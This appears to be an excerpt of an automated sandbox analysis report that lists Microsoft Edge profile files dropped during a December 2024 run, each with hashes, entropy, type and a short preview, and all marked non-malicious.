                                                                                                                                                                                                                                                                                          Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2312134838858
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Rw+q2PcNwi23oH+Tcwt8aPrqIFUt8O8RDXZmw+O8RD3VkwOcNwi23oH+Tcwt8h:7YvLZYebL3FUt8Ou/+OC54ZYebQJ
                                                                                                                                                                                                                                                                                          MD5:AAF8C36F2C6D55DE0450A96998B3934B
                                                                                                                                                                                                                                                                                          SHA1:39FB64A47A47D5A6AB2B10B910FAF2820901B271
                                                                                                                                                                                                                                                                                          SHA-256:8B56E69DF9C94CEA074C8F24B8C07F7F6092E808422CBD9ACE5819815C2DF7DD
                                                                                                                                                                                                                                                                                          SHA-512:FB700765BA0801D92CE8B1DCADA3091E037D5F91AEDDEC0201E5164A82F7B11B2DDA01B43E443CE56F93934625D6D50129B8D5BFDF9D7EFFAC9827396C373145
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.792 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/19-03:45:52.793 19e8 Recovering log #3.2024/12/19-03:45:52.793 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2312134838858
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Rw+q2PcNwi23oH+Tcwt8aPrqIFUt8O8RDXZmw+O8RD3VkwOcNwi23oH+Tcwt8h:7YvLZYebL3FUt8Ou/+OC54ZYebQJ
                                                                                                                                                                                                                                                                                          MD5:AAF8C36F2C6D55DE0450A96998B3934B
                                                                                                                                                                                                                                                                                          SHA1:39FB64A47A47D5A6AB2B10B910FAF2820901B271
                                                                                                                                                                                                                                                                                          SHA-256:8B56E69DF9C94CEA074C8F24B8C07F7F6092E808422CBD9ACE5819815C2DF7DD
                                                                                                                                                                                                                                                                                          SHA-512:FB700765BA0801D92CE8B1DCADA3091E037D5F91AEDDEC0201E5164A82F7B11B2DDA01B43E443CE56F93934625D6D50129B8D5BFDF9D7EFFAC9827396C373145
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.792 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/19-03:45:52.793 19e8 Recovering log #3.2024/12/19-03:45:52.793 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):334
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.214049345855342
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RMU+q2PcNwi23oH+Tcwt865IFUt8O8RM0Zmw+O8RMUVkwOcNwi23oH+Tcwt86L:7NpvLZYeb/WFUt8ON0/+ON054ZYeb/+e
                                                                                                                                                                                                                                                                                          MD5:AC69E6B3BEE3722ACCF3940869A5363F
                                                                                                                                                                                                                                                                                          SHA1:76924A4ECC0BACA35E8D884F4F1774E445DBD3CA
                                                                                                                                                                                                                                                                                          SHA-256:245C4ED0ACCF63468CC406B0BCF55E946D2E8FA2B2B08FAEED1167BE485AC067
                                                                                                                                                                                                                                                                                          SHA-512:E8E4614F95D87AEAEE76270CBCBD56DC9F28783E8DB1D462A6D70BC321A6AFB5D36ACCB572213942467FD003161B80712DC6F677545BFA215A081EF644AADC24
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.803 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/19-03:45:52.803 19e8 Recovering log #3.2024/12/19-03:45:52.803 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):334
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.214049345855342
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RMU+q2PcNwi23oH+Tcwt865IFUt8O8RM0Zmw+O8RMUVkwOcNwi23oH+Tcwt86L:7NpvLZYeb/WFUt8ON0/+ON054ZYeb/+e
                                                                                                                                                                                                                                                                                          MD5:AC69E6B3BEE3722ACCF3940869A5363F
                                                                                                                                                                                                                                                                                          SHA1:76924A4ECC0BACA35E8D884F4F1774E445DBD3CA
                                                                                                                                                                                                                                                                                          SHA-256:245C4ED0ACCF63468CC406B0BCF55E946D2E8FA2B2B08FAEED1167BE485AC067
                                                                                                                                                                                                                                                                                          SHA-512:E8E4614F95D87AEAEE76270CBCBD56DC9F28783E8DB1D462A6D70BC321A6AFB5D36ACCB572213942467FD003161B80712DC6F677545BFA215A081EF644AADC24
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.803 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/19-03:45:52.803 19e8 Recovering log #3.2024/12/19-03:45:52.803 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1254
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                          MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                          SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                          SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                          SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1954682176217455
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RoGU+q2PcNwi23oH+Tcwt8NIFUt8O8RoMLZmw+O8RoMbVkwOcNwi23oH+Tcwt2:7p4vLZYebpFUt8OpO/+Opi54ZYebqJ
                                                                                                                                                                                                                                                                                          MD5:8F5C8E16A32DA4C69800574A7759EAA4
                                                                                                                                                                                                                                                                                          SHA1:21FEF87145D34D8C640FB616DFB0404C06324F87
                                                                                                                                                                                                                                                                                          SHA-256:B5CD00266DEB34C6BDEC7D7929CE851630EB78F5F9F801AF27FFC31A7F059DCA
                                                                                                                                                                                                                                                                                          SHA-512:CD58388D27F942DF415295ED3EE37A813BAAB0383B9F1B04C0E0D83DE195B26ABEA4030760B00FCB0C3BAC3B2687BD453D3DD81181DE4997B5B46C923D70F09C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.522 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/19-03:45:53.523 19e8 Recovering log #3.2024/12/19-03:45:53.523 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1954682176217455
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78RoGU+q2PcNwi23oH+Tcwt8NIFUt8O8RoMLZmw+O8RoMbVkwOcNwi23oH+Tcwt2:7p4vLZYebpFUt8OpO/+Opi54ZYebqJ
                                                                                                                                                                                                                                                                                          MD5:8F5C8E16A32DA4C69800574A7759EAA4
                                                                                                                                                                                                                                                                                          SHA1:21FEF87145D34D8C640FB616DFB0404C06324F87
                                                                                                                                                                                                                                                                                          SHA-256:B5CD00266DEB34C6BDEC7D7929CE851630EB78F5F9F801AF27FFC31A7F059DCA
                                                                                                                                                                                                                                                                                          SHA-512:CD58388D27F942DF415295ED3EE37A813BAAB0383B9F1B04C0E0D83DE195B26ABEA4030760B00FCB0C3BAC3B2687BD453D3DD81181DE4997B5B46C923D70F09C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.522 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/19-03:45:53.523 19e8 Recovering log #3.2024/12/19-03:45:53.523 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.21917635620654863
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:5ZtFlljq7A/mhWJFuQ3yy7IOWURudweytllrE9SFcTp4AGbNCV9RUI+:M75fOid0Xi99pEYE
                                                                                                                                                                                                                                                                                          MD5:57CE59652CA7F2442178A7E9325C4749
                                                                                                                                                                                                                                                                                          SHA1:68D66F301C777D86EC1E0EDF343AC607C4DE9992
                                                                                                                                                                                                                                                                                          SHA-256:DC6E30678357424F99C655C1AE83D39C6051B35CAE253F7384B66430D2008B96
                                                                                                                                                                                                                                                                                          SHA-512:39541A3CACAD4FCF5950CD06D2341D80A8AE76F26791FD405B2E936AB495892938F8A8553E2DA854E497779070B3F5E63AE0B6EC27DF41442B9252863045CA69
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:............`8.....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6476102401264106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:aj9P0Pgam6IZP/KbtQQkQerV773pLgjl7hlcERKToaAu:adJpP/le2V7kl7AERKcC
                                                                                                                                                                                                                                                                                          MD5:2C921CA2D9C1449A1900658C31FABB51
                                                                                                                                                                                                                                                                                          SHA1:979C8326A8E02ABA2E417BD1271F591BFCAF1BC9
                                                                                                                                                                                                                                                                                          SHA-256:5970D62F7D798B829BFBD05C25D82DBF3E1AD27AD7CDDB574A64CACCEBAE1242
                                                                                                                                                                                                                                                                                          SHA-512:8ED4F16F236024CD6AD78FBBEB571AB119F036C7FD1023FBBEA6AA6335D1CE245508D6E49EBB91F4A20B3F84D20DFF6FF01C2A69DA4454CAD4DA5E82B7BC1BB1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):411
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324256432826978
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7HeVvLZYeb8rcHEZrELFUt8OHeG1/+OHeI54ZYeb8rcHEZrEZSJ:7+5lYeb8nZrExg8O+w+SoYeb8nZrEZe
                                                                                                                                                                                                                                                                                          MD5:9192CEA5ACCF35A78CB7336E53CB1493
                                                                                                                                                                                                                                                                                          SHA1:66FE93091BDCDA5F9516F1BD4E9EC6CE307A569F
                                                                                                                                                                                                                                                                                          SHA-256:F77BC21531C16FF55652742291618EC990A0F488B84AD6C0908BDDF40DA2DD10
                                                                                                                                                                                                                                                                                          SHA-512:466EC6FECB6EA4A9C1F6A60877D67B594296D111C45437DB5300DA76B2F783CBCC9DE253CBBA2A26AB13C57AE36C1DEF948A47E88F840729AAFB95FA7FC05ED4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:56.581 838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/19-03:45:56.581 838 Recovering log #3.2024/12/19-03:45:56.581 838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):411
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324256432826978
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:7HeVvLZYeb8rcHEZrELFUt8OHeG1/+OHeI54ZYeb8rcHEZrEZSJ:7+5lYeb8nZrExg8O+w+SoYeb8nZrEZe
                                                                                                                                                                                                                                                                                          MD5:9192CEA5ACCF35A78CB7336E53CB1493
                                                                                                                                                                                                                                                                                          SHA1:66FE93091BDCDA5F9516F1BD4E9EC6CE307A569F
                                                                                                                                                                                                                                                                                          SHA-256:F77BC21531C16FF55652742291618EC990A0F488B84AD6C0908BDDF40DA2DD10
                                                                                                                                                                                                                                                                                          SHA-512:466EC6FECB6EA4A9C1F6A60877D67B594296D111C45437DB5300DA76B2F783CBCC9DE253CBBA2A26AB13C57AE36C1DEF948A47E88F840729AAFB95FA7FC05ED4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:56.581 838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/19-03:45:56.581 838 Recovering log #3.2024/12/19-03:45:56.581 838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.654725900836922
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:o+ZrE0d2KN+9XZdDV03Sx4hryIH7AHHk2GJ348ylsT:o+2WA5LbhdP8osT
                                                                                                                                                                                                                                                                                          MD5:25FD2E00FD25D876D34227F6EE966A0B
                                                                                                                                                                                                                                                                                          SHA1:EB8135C57045133E3A7642101F003013FE61A90C
                                                                                                                                                                                                                                                                                          SHA-256:E9A5A88B2798CE2E279CDBCCC09EEE9702BF8EB598CE59CD08B00767BBBF6C10
